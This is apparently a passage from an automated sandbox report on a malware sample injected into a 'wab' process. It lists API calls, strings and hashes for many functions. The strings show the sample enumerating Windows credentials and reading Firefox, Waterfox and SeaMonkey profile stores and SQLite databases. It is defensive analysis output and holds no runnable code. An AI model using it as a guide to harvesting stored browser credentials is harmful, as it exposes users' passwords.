                                                                                                                                                • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                                                                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                                                                                • memcpy.MSVCRT ref: 0040BEB2
                                                                                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3191383707-0
                                                                                                                                                • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                                                                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                                                                                • memset.MSVCRT ref: 00403D13
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                                                                                • API String ID: 3527940856-11920434
                                                                                                                                                • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                                                                                • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                                                                                • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403E50
                                                                                                                                                • memset.MSVCRT ref: 00403E65
                                                                                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                                                                                • API String ID: 3527940856-2068335096
                                                                                                                                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                                                                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                                                                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                                                                                • memset.MSVCRT ref: 0040400B
                                                                                                                                                • memset.MSVCRT ref: 00404020
                                                                                                                                                • memset.MSVCRT ref: 00404035
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 004040FC
                                                                                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                • API String ID: 3527940856-3369679110
                                                                                                                                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                • API String ID: 3510742995-2641926074
                                                                                                                                                • Opcode ID: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
                                                                                                                                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                • Opcode Fuzzy Hash: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
                                                                                                                                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                • memset.MSVCRT ref: 004033B7
                                                                                                                                                • memcpy.MSVCRT ref: 004033D0
                                                                                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                                                • String ID: $0.@
                                                                                                                                                • API String ID: 3030842498-1896041820
                                                                                                                                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2941347001-0
                                                                                                                                                • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00403C09
                                                                                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                • API String ID: 3249829328-1174173950
                                                                                                                                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040A824
                                                                                                                                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 669240632-0
                                                                                                                                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • wcschr.MSVCRT ref: 00414458
                                                                                                                                                • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                • String ID: "%s"
                                                                                                                                                • API String ID: 1343145685-3297466227
                                                                                                                                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                • API String ID: 1714573020-3385500049
                                                                                                                                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004087D6
                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                • memset.MSVCRT ref: 00408828
                                                                                                                                                • memset.MSVCRT ref: 00408840
                                                                                                                                                • memset.MSVCRT ref: 00408858
                                                                                                                                                • memset.MSVCRT ref: 00408870
                                                                                                                                                • memset.MSVCRT ref: 00408888
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2911713577-0
                                                                                                                                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcmp
                                                                                                                                                • String ID: @ $SQLite format 3
                                                                                                                                                • API String ID: 1475443563-3708268960
                                                                                                                                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                • memset.MSVCRT ref: 00414C87
                                                                                                                                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                Strings
                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                • API String ID: 2705122986-2036018995
                                                                                                                                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmpqsort
                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                • API String ID: 1579243037-1578091866
                                                                                                                                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040E60F
                                                                                                                                                • memset.MSVCRT ref: 0040E629
